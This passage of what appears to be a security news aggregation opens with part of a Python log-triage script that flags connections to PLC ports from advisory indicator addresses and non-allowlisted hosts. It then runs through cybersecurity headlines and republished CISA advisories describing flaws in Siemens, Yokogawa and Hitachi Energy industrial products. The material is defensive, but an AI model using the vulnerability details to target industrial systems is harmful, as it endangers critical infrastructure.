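    2222: "EtherNet/IP (CIP implicit I/O)",
    102: "ISO-TSAP (Siemens S7comm)",
    502: "Modbus/TCP",
    22: "SSH (the actors deployed Dropbear on victim endpoints)",
}

# ASSUMPTION: the only hosts permitted to open sessions to PLCs, e.g. the
# jump host and engineering workstations behind the secure gateway.
ALLOWED_SOURCES = {"10.20.0.5", "10.20.0.6"}

# ASSUMPTION: this many sessions from one source to one PLC port in a log
# batch is treated as a sustained/repeated attempt worth a finding.
REPEAT_THRESHOLD = 5


def parse_line(line):
    """Parse one 'key=value ...' record: dport becomes int, ts a naive UTC datetime."""
    rec = dict(token.split("=", 1) for token in line.split())
    rec["dport"] = int(rec["dport"])
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def ioc_status(src, ts):
    """Return 'ioc_in_window', 'ioc_outside_window', or None for a source IP."""
    window = IOC_WINDOWS.get(src)
    if window is None:
        return None
    month = ts.strftime("%Y-%m")  # zero-padded YYYY-MM compares correctly as text
    return "ioc_in_window" if window[0] <= month <= window[1] else "ioc_outside_window"


def triage(lines):
    """Return (finding, src, dst, dport, detail) tuples for traffic to OT ports."""
    findings = []
    sessions = Counter()
    reported = set()
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        src, dst, dport = rec["src"], rec["dst"], rec["dport"]
        if dport not in OT_PORTS:
            continue  # not one of the OT/management ports named in the advisory
        proto = OT_PORTS[dport]
        sessions[(src, dst, dport)] += 1
        status = ioc_status(src, rec["ts"])
        if status:
            findings.append((status, src, dst, dport, proto))
        elif src not in ALLOWED_SOURCES and (src, dst, dport) not in reported:
            # Not a listed indicator, but not a host that should ever reach a PLC either.
            reported.add((src, dst, dport))
            findings.append(("unexpected_source", src, dst, dport, proto))
    for (src, dst, dport), n in sessions.items():
        if n >= REPEAT_THRESHOLD and src not in ALLOWED_SOURCES:
            findings.append(("repeated_attempts", src, dst, dport, f"{n} sessions"))
    return findings


# Constructed sample: PLCs in 192.0.2.0/24; one Table 1 address inside its window,
# one outside it, an unlisted external host hammering SSH, and benign EWS traffic.
SAMPLE_LOG = """\
ts=2026-03-12T04:13:22Z src=185.82.73.164 dst=192.0.2.10 dport=44818 proto=tcp action=accept
ts=2024-11-02T09:00:00Z src=185.82.73.162 dst=192.0.2.10 dport=502 proto=tcp action=accept
ts=2026-03-13T11:45:10Z src=10.20.0.5 dst=192.0.2.10 dport=44818 proto=tcp action=accept
ts=2026-03-13T12:01:00Z src=198.51.100.77 dst=192.0.2.11 dport=102 proto=tcp action=accept
ts=2026-03-13T12:02:00Z src=198.51.100.77 dst=192.0.2.11 dport=22 proto=tcp action=accept
ts=2026-03-13T12:02:03Z src=198.51.100.77 dst=192.0.2.11 dport=22 proto=tcp action=accept
ts=2026-03-13T12:02:06Z src=198.51.100.77 dst=192.0.2.11 dport=22 proto=tcp action=accept
ts=2026-03-13T12:02:09Z src=198.51.100.77 dst=192.0.2.11 dport=22 proto=tcp action=accept
ts=2026-03-13T12:02:12Z src=198.51.100.77 dst=192.0.2.11 dport=22 proto=tcp action=accept
ts=2026-03-13T12:05:00Z src=10.20.0.5 dst=192.0.2.10 dport=443 proto=tcp action=accept
""".splitlines()

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding)
```

Two design points follow the advisory's own caveats: a Table 1 address seen outside its association window is still reported, but tagged separately, because the disclaimer asks defenders to vet the addresses before acting on them; and a source that is not a listed indicator is flagged simply for not being on the allowlist of hosts that may talk to a PLC, which is the "device control list" check from the Mitigations and does not depend on the actors reusing infrastructure.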

Solana Foundation looks to beef up DeFi security as attacks continue

The Solana Foundation and Web3 security firm Asymmetric Research unveiled a new security initiative called STRIDE, along with a real-time incident-response network.

German authorities identify REvil and GandCrab ransomware bosses

The Federal Police in Germany (BKA) has identified two Russian nationals as the leaders of GandCrab and REvil ransomware operations between 2019 and 2021. [...]

New GPUBreach attack enables system takeover via GPU rowhammer

A new attack, dubbed GPUBreach, can induce Rowhammer bit-flips on GPU GDDR6 memories to escalate privileges and lead to a full system compromise. [...]

AI-Assisted Supply Chain Attack Targets GitHub

PRT-scan is the second campaign in recent months where a threat actor appears to have leveraged AI for automated targeting of a widespread GitHub misconfiguration.

Axios Attack Shows Complex Social Engineering Is Industrialized

The attack on the popular NPM package Axios is just one of many targeting maintainers and has shone a light on how threat actors can scale sophisticated social engineering campaigns.

Fortinet Issues Emergency Patch for FortiClient Zero-Day

The authentication bypass flaw, tracked as CVE-2026-35616, is the latest in a series of Fortinet vulnerabilities that have been exploited in the wild.

Disgruntled researcher leaks “BlueHammer” Windows zero-day exploit

Exploit code has been released for an unpatched Windows privilege escalation flaw reported privately to Microsoft, allowing attackers to gain SYSTEM or elevated administrator permissions. [...]

Iran threatens ‘Stargate’ AI data centers

Iran said it will target U.S.-linked data centers with new missile strikes, as the war between the U.S. and Iran escalates.

Microsoft links Medusa ransomware affiliate to zero-day attacks

Microsoft says that Storm-1175, a China-based financially motivated cybercriminal group known for deploying Medusa ransomware payloads, has been deploying n-day and zero-day exploits in high-velocity attacks. [...]

North Korea’s hijack of one of the web’s most used open source projects was likely weeks in the making

North Korean hackers pushed out malicious updates to a popular open source project by hacking a top developer's computer in a long-running campaign.

Drift $280M crypto theft linked to 6-month in-person operation

The Drift Protocol says that the $280+ million hack it suffered last week was the result of a long-term, carefully planned operation that included building "a functioning operational presence inside the Drift ecosystem." [...]

CISA orders feds to patch exploited Fortinet EMS flaw by Friday

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered federal agencies to secure FortiClient Enterprise Management Server (EMS) instances against an actively exploited vulnerability by Friday. [...]

Automated Credential Harvesting Campaign Exploits React2Shell Flaw

An emerging threat cluster tracked as UAT-10608 is exploiting vulnerable Web-exposed Next.js apps and using an automated tool to exfiltrate credentials, secrets, and other system data.

Delivered by Trust: What the Axios Supply Chain Attack Means for Security Leaders

A trusted package turned into an attacker’s gateway overnight. The Axios supply chain breach shows how quickly risk can spread—and why security leaders must rethink trust in modern development.

Why Simple Breach Monitoring is No Longer Enough

Infostealers are harvesting credentials and session cookies at scale, bypassing traditional defenses. Lunar explains why simple breach monitoring alone can't keep up with modern credential-based attacks. [...]

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-35616: Fortinet FortiClient EMS Improper Access Control Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Trump-Iran deadline chaos sends crypto higher while ceasefire hopes rise

US President Donald Trump threatened Iran could be "living in Hell" if it doesn't open the Strait of Hormuz, though he also told reporters that a deal with Iran is getting close.

Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab

An elusive hacker who went by the handle "UNKN" and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face. Authorities in Germany say 31-year-old Russian Daniil Maksimovich Shchukin headed both cybercrime gangs and helped carry out at least 130 acts of computer sabotage and extortion against victims across the country between 2019 and 2021.

Crypto attorney says Drift incident may qualify as 'civil negligence'

The $280 million Drift Protocol attack was likely carried out by threat actors aligned with North Korea's state-affiliated hackers.

New FortiClient EMS flaw exploited in attacks, emergency patch released

Fortinet has released an emergency weekend security update for a new critical FortiClient Enterprise Management Server (EMS) vulnerability that is actively exploited in attacks. [...]

Hackers exploit React2Shell in automated credential theft campaign

Hackers are running a large-scale campaign to steal credentials in an automated way after exploiting React2Shell (CVE-2025-55182) in vulnerable Next.js apps. [...]

Drift Protocol says $280M exploit took 'months of deliberate preparation'

Drift Protocol said with “medium-high confidence” that the recent attack was carried out by the same actors responsible for the $58 million Radiant Capital hack in October 2024.

Axios npm hack used fake Teams error fix to hijack maintainer account

The maintainers of the popular Axios HTTP client have published a detailed post-mortem describing how one of its developers was targeted by a social engineering campaign believed to have been conducted by North Korean threat actors. [...]

Device code phishing attacks surge 37x as new kits spread online

Device code phishing attacks that abuse the OAuth 2.0 Device Authorization Grant flow to hijack accounts have surged more than 37 times this year. [...]

After fighting malware for decades, this cybersecurity veteran is now hacking drones

Mikko Hyppönen is one of the most recognizable faces of the cybersecurity industry. After fighting computer viruses, worms, and malware for more than 35 years, he tells TechCrunch why he is now working on systems to stop killer drones.

A Vulnerability in Fortinet FortiClientEMS Could Allow for Arbitrary Code Execution

A vulnerability has been discovered in Fortinet FortiClientEMS that could allow for arbitrary code execution. FortiClientEMS is a centralized management platform for deploying, configuring, monitoring, and enforcing security policies across numerous endpoints (computers) running the FortiClient agent. Successful exploitation of this vulnerability could allow for arbitrary code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured with fewer user rights on the system could be less impacted than those that operate with administrative user rights.

Hims & Hers warns of data breach after Zendesk support ticket breach

Telehealth giant Hims & Hers Health is warning that it suffered a data breach after support tickets were stolen from a third-party customer service platform. [...]

Die Linke German political party confirms data stolen by Qilin ransomware

The Qilin ransomware group has claimed responsibility for an attack against Die Linke ('The Left'), forcing an IT systems outage at the political party and threatening to leak sensitive data. [...]

Europe’s cyber agency blames hacking gangs for massive data breach and leak

CERT-EU blamed the cybercrime group TeamPCP for the recent hack on the European Commission, and said the notorious ShinyHunters gang was responsible for leaking the stolen data online.

Blast Radius of TeamPCP Attacks Expands Amid Hacker Infighting

As organizations disclose breaches tied to TeamPCP's supply chain attacks, ShinyHunters and Lapsus$ are getting involved, taking credit, and creating a murky situation for enterprises.

Execution risk in crypto is the new custody risk

Execution risk in crypto is the new custody risk. Live credentials, not just private keys, are now the main attack surface.

Evolution of Ransomware: Multi-Extortion Ransomware Attacks

Multi-extortion ransomware relies on stolen data to pressure victims with public leaks. Penta Security explains how its D.AMO platform keeps exfiltrated files encrypted and useless to attackers. [...]

Drift sends onchain message to wallets tied to $280M exploit

Drift Protocol initiated onchain contact with wallets tied to the $280 million exploit as an unknown sender also attempts to pressure the attacker.

Crypto hackers steal $169M from 34 DeFi protocols in Q1: DefiLlama

January saw the largest attack against a DeFi protocol of the quarter, the $40 million private key compromise of portfolio management platform Step Finance.

CERT-EU: European Commission hack exposes data of 30 EU entities

The European Union's Cybersecurity Service (CERT-EU) has attributed the European Commission cloud hack to the TeamPCP threat group, saying the resulting breach exposed the data of at least 29 other Union entities. [...]

Telehealth giant Hims & Hers says its customer support system was hacked

The U.S. telehealth giant says hackers stole customer support ticket data over the course of several days in February.

Geopolitics, AI, and Cybersecurity: Insights From RSAC 2026

AI-driven threats, global leadership shifts, and the future of cybersecurity in a rapidly evolving landscape were among the discussions at RSAC 2026 Conference.

Claude Code leak used to push infostealer malware on GitHub

Threat actors are exploiting the recent Claude Code source code leak by using fake GitHub repositories to deliver Vidar information-stealing malware. [...]

Not Toying Around: Hasbro Attack May Take 'Weeks' to Remediate

The company's 8-K filing notes "unauthorized access" and that it has activated business continuity plans and taken some systems offline.

Drift loses $280 million as North Korean hackers seize Security Council powers

The Drift Protocol lost at least $280 million after a threat actor took control of its Security Council administrative powers in a planned, sophisticated operation. [...]

Multiple Vulnerabilities in Progress ShareFile Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Progress ShareFile, which when chained together, could allow for remote code execution. Progress ShareFile is a secure, cloud-based content collaboration and file-sharing platform. It enables businesses to securely exchange documents, manage client workflows, and obtain electronic signatures, with a focus on compliance for industries like finance and healthcare. Successful exploitation of the vulnerabilities when chained together could allow attackers to abuse the file upload and extraction functionality to place malicious ASPX webshells in the application’s webroot.

ICE says it bought Paragon’s spyware to use in drug trafficking cases

The acting director of U.S. Immigration and Customs Enforcement told lawmakers that the use of Paragon spyware is necessary to counter terrorists’ “thriving exploitation of encrypted communications platforms.”

Residential proxies evaded IP reputation checks in 78% of 4B sessions

Researchers warn that residential proxies used to route malicious traffic are a big problem for IP reputation systems, as there is no clear distinction between attackers and legitimate users. [...]

Multiple Vulnerabilities in Cisco Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Cisco products, the most severe of which could allow for arbitrary code execution. Cisco Smart Software Manager On-Prem is a centralized Cisco tool used by organizations to manage software licenses, entitlements, and compliance for Cisco products within their own network environment. Cisco Integrated Management Controller (IMC) is embedded server management software that allows administrators to remotely monitor, configure, and control Cisco servers without needing an operating system installed. Cisco Evolved Programmable Network Manager (EPNM) is a network management platform used to provision, monitor, and automate large-scale Cisco network infrastructures. Cisco Nexus Dashboard is a centralized management and operations platform that provides visibility, policy management, and analytics across Cisco Nexus data center networks. Cisco Nexus Dashboard Insights is an analytics and assurance application that runs on Nexus Dashboard to detect configuration issues, performance problems, and network anomalies in data center environments. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution, which may lead to the complete compromise of the affected device.

Adversaries Exploit Vacant Homes to Intercept Mail in Hybrid Cybercrime

Threat actors are exploiting vacant homes as "drop addresses" to intercept mail and enable fraud. Flare shows how postal services and fake identities are abused to turn mail into a fraud vector. [...]

New Progress ShareFile flaws can be chained in pre-auth RCE attacks

Two vulnerabilities in Progress ShareFile, an enterprise-grade secure file transfer solution, can be chained to enable unauthenticated file exfiltration from affected environments. [...]

Medtech giant Stryker fully operational after data-wiping attack

Stryker Corporation, one of the world's leading medical technology companies, says it's fully operational three weeks after many of its systems were wiped out in a cyberattack claimed by the Iranian-linked Handala hacktivist group. [...]

Siemens SICAM 8 Products

Summary

Multiple SICAM 8 products are affected by multiple vulnerabilities that could lead to denial of service, namely:
- SICAM A8000 Device firmware
  - CPCI85 for CP-8031/CP-8050
  - SICORE for CP-8010/CP-8012
  - RTUM85 for CP-8010/CP-8012
- SICAM EGS Device firmware
  - CPCI85
- SICAM S8000
  - SICORE
  - RTUM85

Siemens has released new versions for the affected products and recommends updating to the latest versions.

The following versions of Siemens SICAM 8 Products are affected:
- CPCI85 Central Processing/Communication vers:intdot/<26.10 (CVE-2026-27663, CVE-2026-27664)
- RTUM85 RTU Base vers:intdot/<26.10 (CVE-2026-27663)
- SICORE Base system vers:intdot/<26.10.0 (CVE-2026-27664)

CVSS v3: 7.5 | Vendor: Siemens | Equipment: Siemens SICAM 8 Products | Vulnerabilities: Allocation of Resources Without Limits or Throttling, Out-of-bounds Write

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-27663

The affected application contains a denial-of-service (DoS) vulnerability. The remote operation mode is susceptible to a resource exhaustion condition when subjected to a high volume of requests. Sending multiple requests can exhaust resources, preventing parameterization and requiring a reset or reboot to restore functionality.

Affected Products: Siemens SICAM 8 Products
Vendor: Siemens
Product Version: CPCI85 Central Processing/Communication, RTUM85 RTU Base
Product Status: known_affected

Remediations:
- Vendor fix: Update to V26.10 or a later version. The firmware RTUM85 V26.10 is present within the “CP-8010/CP-8012 Package” V26.10 (https://support.industry.siemens.com/cs/ww/en/view/109972894/) and also within the “SICAM S8000 Package” V26.10 (https://support.industry.siemens.com/cs/document/109818240).
- Vendor fix: Update to V26.10 or a later version. The firmware CPCI85 V26.10 is present within the “CP-8031/CP-8050 Package” V26.10 (https://support.industry.siemens.com/cs/ww/en/view/109804985/) and also within the “SICAM EGS Package” V26.10 (https://support.industry.siemens.com/cs/document/109972536/).

Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS 3.1 base score 6.5 (MEDIUM), vector string CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2026-27664

The affected application contains an out-of-bounds write vulnerability while parsing specially crafted XML inputs. This could allow an unauthenticated attacker to exploit this issue by sending a malicious XML request, which may cause the service to crash, resulting in a denial-of-service condition.

Affected Products: Siemens SICAM 8 Products
Vendor: Siemens
Product Version: CPCI85 Central Processing/Communication, SICORE Base system
Product Status: known_affected

Remediations:
- Vendor fix: Update to V26.10 or a later version. The firmware CPCI85 V26.10 is present within the “CP-8031/CP-8050 Package” V26.10 (https://support.industry.siemens.com/cs/ww/en/view/109804985/) and also within the “SICAM EGS Package” V26.10 (https://support.industry.siemens.com/cs/document/109972536/).
- Vendor fix: Update to V26.10.0 or a later version. The firmware SICORE V26.10.0 is present within the “CP-8010/CP-8012 Package” V26.10 (https://support.industry.siemens.com/cs/ww/en/view/109972894/) and also within the “SICAM S8000 Package” V26.10 (https://support.industry.siemens.com/cs/document/109818240).

Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1 base score 7.5 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Acknowledgments

- T. Weber, S. Dietz, D. Blagojevic, and F. Koroknai of CyberDanube coordinated disclosure of CVE-2026-27663.
- S. Dietz of CyberDanube and VERBUND Digital Power coordinated disclosure of CVE-2026-27664.
- S. Dietz of Siemens ProductCERT reported these vulnerabilities to CISA.

General Recommendations

Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design.

Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before it is applied, and supervision by trained staff of the update process in the target environment.

As a general security measure, Siemens strongly recommends protecting network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment. Recommended security guidelines can be found at: https://www.siemens.com/gridsecurity

Additional Resources

For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use

The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of Siemens ProductCERT SSA-246443 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-03-26
- 2026-03-26, Revision 1: Publication Date
- 2026-04-02, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-246443 advisory

Yokogawa CENTUM VP

Summary

Successful exploitation of this vulnerability could allow an attacker to log in as the PROG user and modify permissions.

The following versions of Yokogawa CENTUM VP are affected: CENTUM VP >=R5.01.00| CENTUM VP >=R6.01.00| CENTUM VP vR7.01.00 (CVE-2025-7741)

CVSS v3: 4 | Vendor: Yokogawa | Equipment: Yokogawa CENTUM VP | Vulnerabilities: Use of Hard-coded Password

Background

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Food and Agriculture
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Japan

Vulnerabilities

CVE-2025-7741

Affected products contain a hardcoded password for the user account (PROG) used for CENTUM Authentication Mode within the system. Under the following conditions, there is a risk that an attacker could log in as the PROG user. The default permission for the PROG user is S1 permission (equivalent to OFFUSER). Therefore, for properly permission-controlled targets of operation and monitoring, even if an attacker logs in as the PROG user, the risk of critical operations or configuration changes being performed is considered low. If the PROG user's permissions have been changed for any reason, there is a risk that operations or configuration changes may be performed under the modified permissions. Additionally, exploiting this vulnerability requires an attacker to already have access to the HIS screen controls.

Affected Products: Yokogawa CENTUM VP
Vendor: Yokogawa
Product Version: Yokogawa CENTUM VP: >=R5.01.00|<R5.04.20, Yokogawa CENTUM VP: >=R6.01.00|<R6.12.00, Yokogawa CENTUM VP: vR7.01.00
Product Status: known_affected

Remediations: Yokogawa recommends that users apply the following mitigations to affected versions:
- Vendor fix: CENTUM VP R5.01.00 to R5.04.20: Change the user authentication mode to Windows Authentication Mode.
- Vendor fix: CENTUM VP R6.01.00 to R6.12.00: Change the user authentication mode to Windows Authentication Mode.
- Vendor fix: CENTUM VP R7.01.00: Apply patch software R7.01.10.
- Mitigation: NOTE: Changing to Windows Authentication Mode requires engineering work. If users wish to make this change, please contact Yokogawa directly: https://contact.yokogawa.com/cs/gw?c-id=000498
- Mitigation: For more information and details on implementing these mitigations, users should see the Yokogawa advisory YSAR-26-0003 at https://web-material3.yokogawa.com/1/39281/files/YSAR-26-0003-E.pdf

Relevant CWE: CWE-259 Use of Hard-coded Password
Metrics: CVSS 3.1 base score 4 (MEDIUM), vector string CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Acknowledgments

Yokogawa reported this vulnerability to CISA.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. This vulnerability has a high attack complexity.

Revision History

Initial Release Date: 2026-04-02
- 2026-04-02, Revision 1: Initial Republication of YSAR-26-0003

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-3502 TrueConf Client Download of Code Without Integrity Check Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Hitachi Energy Ellipse

Summary

Hitachi Energy is aware of a Jasper Report vulnerability that affects the Ellipse product versions mentioned in this document below. This vulnerability can be exploited to carry out a remote code execution (RCE) attack on the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.

The following versions of Hitachi Energy Ellipse are affected:
- Ellipse vers:Ellipse/<=9.0.50 (CVE-2025-10492)

CVSS v3: 9.8 | Vendor: Hitachi Energy | Equipment: Hitachi Energy Ellipse | Vulnerabilities: Deserialization of Untrusted Data

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-10492

A vulnerability exists in the Jasper Report third-party component that is used for creating custom reports in the Ellipse product. A Java deserialization vulnerability has been discovered in the Jaspersoft Library. Improper handling of externally supplied data may allow attackers to execute arbitrary code remotely on systems that use the affected library.

Affected Products: Hitachi Energy Ellipse
Vendor: Hitachi Energy
Product Version: Ellipse versions 9.0.50 and prior
Product Status: known_affected

Remediations:
- Mitigation: Since the vulnerability exists in the Jasper Report component that is external to the Ellipse application, restrict the loading of external custom reports created by end users by allowing only trusted Jasper reports generated by the system administrator.

Relevant CWE: CWE-502 Deserialization of Untrusted Data
Metrics: CVSS 3.1 base score 9.8 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Acknowledgments

Hitachi Energy PSIRT reported this vulnerability to CISA.

Notice

The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Support

For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https://www.hitachienergy.com/contact-us/ for Hitachi Energy contact centers.

General Mitigation Factors

Recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. Proper password policies and processes should be followed.

Legal Notice and Terms of Use

This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices

CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize a VPN is only as secure as its connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000238 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-02-24
- 2026-02-24, Revision 1: Initial public release
- 2026-04-02, Revision 2: Initial CISA Republication of Hitachi Energy PSIRT 8DBD000238 advisory

Critical Cisco IMC auth bypass gives attackers Admin access

Cisco has patched several critical and high-severity vulnerabilities, including an Integrated Management Controller (IMC) authentication bypass that enables attackers to gain Admin access. [...]

Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks

Internet security watchdog Shadowserver has found over 14,000 BIG-IP APM instances exposed online amid ongoing attacks exploiting a critical-severity remote code execution (RCE) vulnerability. [...]

Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

